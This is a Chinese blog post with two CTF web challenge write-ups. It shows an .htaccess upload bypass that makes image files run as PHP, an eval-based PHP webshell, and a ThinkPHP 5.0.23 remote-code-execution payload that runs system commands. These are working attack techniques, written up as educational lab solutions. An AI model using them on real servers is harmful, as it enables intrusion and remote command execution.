2021-01-30

最新推荐文章于 2024-06-19 16:25:30 发布
最新推荐文章于 2024-06-19 16:25:30 发布
阅读量193 收藏
点赞数
分类专栏: BUUCTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53314778/article/details/113444951
版权
web 同时被 2 个专栏收录
52 篇文章 0 订阅
订阅专栏
BUUCTF
46 篇文章 0 订阅
订阅专栏

[GXYCTF2019]BabyUpload

知识点
.htaccess文件上传绕过

l流程:

先上传一个小马看看,ph 后缀的都被ban了
在这里插入图片描述
图片马试一试,凉凉,看看是什么服务,搞一个不存在的页面让它404

在这里插入图片描述
在这里插入图片描述apache的,那就用 .htaccess文件

<FilesMatch "flag.png">
 SetHandler application/x-httpd-php
</FilesMatch>
匹配到flag一句话木马文件,让其成为php执行

或者

 SetHandler application/x-httpd-php
用 .htaccess让apache将所有上传的文件都当成php来执行

在这里插入图片描述
上传成功后,会返回上传的路径
在这里插入图片描述

然后在传一个图片马就行,额一句话的木马不行,应该是过滤了<?,就用js引用,代码如下(这个题限制了jpg,不过png也可以)

GIF89a?
<script language="php">eval($_POST['xxx']);</script>

在这里插入图片描述
返回路径
在这里插入图片描述
访问一下,发现访问成功,直接用蚁剑连接,flag在根目录里 /flag

不用蚁剑的话,post xxx=system(‘cat /flag’),因为系统函数都被禁止了

在这里插入图片描述这个不行
看一下phpinfo 发现
在这里插入图片描述在这里插入图片描述这里介绍一下PHP show_source() 函数

show_source() 函数对文件进行语法高亮显示

语法

show_source(filename,return)
本函数是 highlight_file() 的别名。

filename 必需。要进行高亮处理的 PHP 文件的路径。

return 可选。如果设置 true,则本函数返回高亮处理的代码。
返回值

如果 return 参数被设置为 true,那么该函数会返回被高亮处理的代码,而不是输出它们。(比如写了一段计算的代码,会返回代码本身而不是计算结果)否则,若成功,则返回 true,失败则返回 false。
在这里插入图片描述

[BJDCTF 2nd]old-hack

THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析

ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析
在这里插入图片描述
告诉了我们是THINKPHP5的漏洞
搜这个版本的漏洞
发现是thinkphp5.0.23的命令执行
payload
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
POST提交尝试一下,发现可行,然后就cat /flag

_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag
查看flag
在这里插入图片描述

无尽星河-深空
关注
专栏目录
backurl: heytapbrowser://main/iflow?sub_target=only_enter_iflow
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-21 2万+
backurl: heytapbrowser://main/iflow?sub_target=only_enter_iflow 1、HTML: changeDiv { background: #eee; color: #093; height: 200px; }
gtk2-runtime-2.24.33-2021-01-30-ts-win64.exe
07-14
gtk2-runtime-2.24.33-2021-01-30-ts-win64.exe
逆向实战 1#去除流氓弹窗和浏览器主页绑定
weixin_48066554的博客
12-23 1万+
逆向实战 1#去除流氓弹窗和浏览器主页绑定 文章目录逆向实战 1#去除流氓弹窗和浏览器主页绑定环境 & 工具案例一案例一行为分析案例一脱壳去除弹窗浏览器弹窗产生方法消息框弹窗产生方法浏览器弹窗解决方法案例二案例二行为分析法案例二脱壳去除弹窗去除主页绑定主页绑定方法修改方法复现资源下载 环境 & 工具 win xp 32位 (还没学到处理ASLR等问题,而且懒得配环境,只能说ASLR一生之敌!) 吾爱破解版ollydbg(大佬亲手调教) PEiD(或别的查壳工具如exeinfope) Imp
入门一.HTB--pwned
最新发布
2301_80284843的博客
06-19 1094
渗透学习
让浏览器处理弹出窗口
weixin_39833509的博客
01-20 1万+
1. Copy and run below whole command totally in Linux under your personal account on your laptop Command:[[ -d ~/scripts ]] || mkdir -p ~/scripts && cat << 'EOT' >~/scripts/ssh-handler.sh && chmod 755 ~/scripts/ssh-handler.sh#!/bi..
linux系统修改IP为静态IP地址-vmware
Chengz77_的博客
04-22 5201
1.编辑虚拟网络编辑器,确认NAT模式及子网IP和子网掩码,根据情况取消本地DHCP服务。4.保存后退出,重启网络服务。5.ip a 检查是否成功。2.终端编辑配置文件。3.编辑其中下面几项。
2021-01-30-alx-cpp
02-13
【标题】"2021-01-30-alx-cpp" 是一个与C++编程相关的项目或教程,可能是一个源代码仓库或者学习资料的集合。由于标题较为简洁,我们无法直接获取具体的技术细节,但可以推测这可能是某个人或团队在2021年1月30日时...
[HACK学习呀] - 2021-01-30 内网渗透|Chisel内网穿透工具1
08-03
一、chisel工具介绍 二、chisel工具下载使用 三、chisel隧道搭建
2021-kn-node-01-es6:2021-kn-node-01-es6
05-05
例如,对于数组`let [a, b, c] = [1, 2, 3]`,对于对象`let {name, age} = {name: 'John', age: 30}`。 4. **默认参数和剩余参数:** 函数参数可以设置默认值,如`function greet(name = 'World') {...}`。剩余...
Reactredux-ts
02-15
该项目是通过。可用脚本在项目目录中,可以运行:yarn start 在开发模式下运行应用程序。 打开在浏览器中查看。 如果进行编辑,页面将重新加载。 您还将在控制台中看到任何棉绒错误。yarn test 在交互式监视模式下...
Web前端:解决浏览器页面回流(reflow)的几种方法
热门推荐
huang100qi的专栏
06-04 2万+
Reflow是载入内容树(在HTML中就是DOM树)和创建或更新frame结构的响应的一种过程。本文旨在讨论几种常见的reflow优化方案,并尝试得到新的方法。 reflow 页面结构 用户体验 交互设计 javascript 目录[-] 1,为什么我们讨厌回流? 2,我们怎样搞定回流? 2.1 CSS中的定位、隐藏 2.2 CSS中的顽固属性 2.3 Jav
discuz密码找回:[1]忘记UCENTER创始人密码
adivlmin816580的博客
08-15 461
人们都是健忘的,何况每天的事情很多,有些站长更是兼职做,赚点外快而已,而ucenter更是不常用,所以忘记密码是在正常不过的事情,如果密码忘记怎么找回呢?方法有很多种,例如用comsenz tools工具,但是这个有版本问题,有些人怕装上出问题,所以这里就不说这种方法了!我们说说怎么通过修改文件找回ucenter创始人密码,希望大家多多支持,如有错误请指正! ...
foxmail7 BUILD093之后再无Foxmail
月清晖的程序猿生活
10-30 4185
foxmail7 BUILD093之后,7.2版本的Foxmail有多不好用,取决于相信Foxmail的群众伤的有多深。 7.2版本各种神奇的bug,就连联系人都会错乱,完全不敢用,奇葩的是7.0、7.1、7.2的数据文件夹还不通用。 foxmail7 BUILD093是最后一个好用的版本,之后,再无Foxmail。 当然,7.093也有小bug: 通讯簿,忘了当时通讯簿数据错误怎么弄回来的了,但记得一条经验反馈: 一定要建一个文件夹,定期把联系人都移进去,根目录下尽量不留邮箱,不然通讯簿数据错误
什么是物联网?如何保护物联网iot安全性
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-04 4664
​物联网iot:物联网(IoT)将生活中事物以网络进行连接,彼此交换信息。整个世界借由设备连接成一体。 对于消费者而言,这意味着您可以在大洋彼岸远程调节家中的恒温器。但是对企业而言,物联网不仅创造了连接客户和合作伙伴的新机会,还能有效收集、存储和分析海量数据。 如何保护物联网iot安全性 嵌入式计算设计文章“When one cyber attack becomes a thousand: Protecting the IoT”(当一次网络攻击变成一千次:保护物联网)带给我们的三条提示
常用窗口操作
通往新世界
08-24 888
【1、最基本的弹出窗口代码】 其实代码非常简单: window.open (page.html) --> 因为着是一段&#106avascripts代码,所以它们应该放在标签和之间。是对一些版本低的浏览器起作用,在这些老浏览器中不会将标签中的代码作为文本显示出来。要养成这个好习惯啊。 window.open (page.html) 用于控制弹出新的窗口page.html,如果p
aspx调试的时候其他机器也可以打开_自动上螺丝的机器怎么调试?
weixin_39551993的博客
11-11 1255
自动上螺丝的机器怎么调试?-苏州嘉宝,随着自动化设备的普遍发展,如今我们在不用手取螺丝的情况下就可以快速的锁好螺丝,这种设备叫自动锁螺丝机或是自动上螺丝机,自动上螺丝机运行稳定可以把螺丝自动送到批嘴旁边,然后轻松的下压电批完成锁螺丝的任务,而且自动锁螺丝机的工作效率特别高,能够明显降低工人强度,所以才会有更多的人选择和使用选材精良的自动锁螺丝机。那自动锁螺丝机在正式使用之前需要进行调试...
记住浏览器上的前进后按钮,记住tab的切换页面
lilyheart的博客
12-01 5580
1.使用bootstarp里的tab页切换效果,根据业务需要需要在返回时记住tab页的切换,不再返回时总是在第一个tab上,加上下面这段代码可实现效果: $(document).ready(function() { if(location.hash) { $('a[href=' + location.hash + ']').tab('show'); }
怎么用backurl跳转_页面跳转到BackURL功能(基于struts2实现)
weixin_39759060的博客
12-20 1092
首先,我们知道,struts2和struts1的一个重要区别就是它进行了Action类和Servlet的解耦。而又提供了获取Servlet API的其它通道,就是ActionContext(别跟我说还有个ServletActionContext,其实ServletActionContext只是ActionContext的一个子页面跳转到BackURL功能(基于s...
id uid exam_id start_time submit_time score 1 1001 9001 2021-09-01 09:01:01 2021-09-01 09:51:01 78 2 1001 9002 2021-09-01 09:01:01 2021-09-01 09:31:00 81 3 1002 9002 2021-09-01 12:01:01 2021-09-01 12:31:01 81 4 1003 9001 2021-09-01 19:01:01 2021-09-01 19:59:01 86 5 1003 9002 2021-09-01 12:01:01 2021-09-01 12:31:51 89 6 1004 9002 2021-09-01 19:01:01 2021-09-01 19:30:01 85 7 1005 9001 2021-09-01 12:01:01 2021-09-01 12:31:02 85 8 1006 9001 2021-09-07 10:01:01 2021-09-07 10:21:01 84 9 1003 9001 2021-09-08 12:01:01 2021-09-08 12:11:01 40 10 1003 9002 2021-09-01 14:01:01 (NULL) (NULL) 11 1005 9001 2021-09-01 14:01:01 (NULL) (NULL) 12 1003 9003 2021-09-08 15:01:01 (NULL) (NULL) sql求时间差
07-25
您可以使用 SQL 中的函数来计算时间差。假设您想要计算 start_time 和 submit_time 之间的时间差,可以使用以下语句: ```sql SELECT id, uid, exam_id, start_time, submit_time, score, EXTRACT(EPOCH FROM ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值